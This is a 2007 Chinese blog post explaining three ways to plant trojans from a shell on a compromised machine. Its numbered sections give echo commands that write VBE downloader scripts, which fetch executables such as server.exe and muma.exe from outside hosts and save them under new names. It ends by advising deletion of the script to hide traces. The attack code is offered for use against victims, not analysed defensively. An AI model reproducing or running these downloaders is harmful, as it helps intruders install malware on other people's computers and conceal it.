3种脚本挂马方式(SHELL中使用)

原创 2007年09月13日 19:56:00
这个方法也是很简单有效的,我们在得到的肉鸡SHELL里依次写入下面这些命令来创建一个VBE文件,代码如下:
echo with w:if .arguments.count^<2 then .quit:end if >xiazai.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>xiazai.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>xiazai.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>xiazai.vbe
这样就会在肉鸡中生成一个xiazai.vbe的文件,如下图是我演示的一个结果显示,我们通过DIR可以看到这个xiazai.vbe文件已经成功创建了。
现在我们只要输入c xianzai.vbe http://iceskysl.e2u.cc/server.exe   mtt.exe就可以把http://iceskysl.e2u.cc/server.exe这个地址下的这个server.exe下载到肉鸡中并且改名字为mtt.exe,目的达到,接着怎么做,我就不多说了!
★六★、利用iget.vbe法
这个方法同上面的那个差不多,只是写法不一样,具体的还是在肉鸡SHELL中写入下面的代码:
echo iLocal = LCase(W.Arguments(1)) >iget.vbe
echo iRemote = LCase(W.Arguments(0)) >>iget.vbe
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe
这样写好后就可以这样执行了c iget.vbe http://icesky.com/muma.exe mm.exe 就可以把http://icesky.com/muma.exe这个地址的程序muma.exe下载下来并且改名字为mm.exe。
★七★、利用Http网站vbe法
这个就是我们前面讲的那个Recton程序种植者所用的HTTP法下载的原理,我们在得到的肉鸡的SHELL里依次写入下面这些:
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >dsa.vbe
echo xPost.Open "GET","http://d.thec.cn/mygoit/readme.exe",0 >>dsa.vbe
echo xPost.Send() >>dsa.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>dsa.vbe
echo sGet.Mode = 3 >>dsa.vbe
echo sGet.Type = 1 >>dsa.vbe
echo sGet.Open() >>dsa.vbe
echo sGet.Write(xPost.responseBody) >>dsa.vbe
echo sGet.SaveToFile "readme.exe",2 >>dsa.vbe
写好后执行:c dsa.vbe 就可以把你上面的那个地址("http://***.*/sample.exe,注意要换成你自己放程序的地址)下的文件下载下来了,最后同样别忘记了用del dsa.vbe删掉我们刚才写的那个文件哦!

 
版权声明:本文为博主原创文章,未经博主允许不得转载。

相关文章推荐

常见挂马方式

shell 脚本中传递参数3种方法的比较

#!/bin/bash #extracting command text_text_text_line options as parameters help_info(){ echo "NA...

CentOS6.7下使用非root用户(普通用户)编译安装与配置mysql数据库并使用shell脚本定时任务方式实现mysql数据库服务随机自动启动

CentOS6.7下使用非root用户(普通用户)编译安装与配置mysql数据库并使用shell脚本定时任务方式实现mysql数据库服务随机自动启动 1.关于mysql? MySQL是一个关系型数...

java 执行sql脚本的3种方式 (ant,ibatis,ScriptRunner)

ant:  java执行sql文件这个问题麻烦的地方在于解析sql脚本文件。所幸的是ant与 ibatis提供了这种实现。 package com.unmi;    ...

Python与shell的3种交互方式介绍

概述 考虑这样一个问题,有hello.py脚本,输出”hello, world!”;有TestInput.py脚本,等待用户输入,然后打印用户输入的数据。那么,怎么样把hello.py输出内容发...

使用Maven运行Java main的3种方式

http://www.vineetmanohar.com/2009/11/3-ways-to-run-java-main-from-maven/

【shell脚本】字符串截取的8种方式

在编写配置脚本时,经常会用到字符串的切割,所以,shell提供了8种字符串的切割方式 我们定义一个变量a=test.c.sh。接下来对它进行切割,直接在命令行演示: 1. # 号截取,删除左边字符...

Ubuntu无需shell脚本建立Matlab桌面快捷方式

1. 说明  当Matlab在Ubuntu上运行时候,每次通过命令行打开过程太复杂,而且还有不停进入相关路径,不方便。那有没有像Windows下的快捷键方式呢?当然有,下面就介绍一下如何在Ubuntu...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)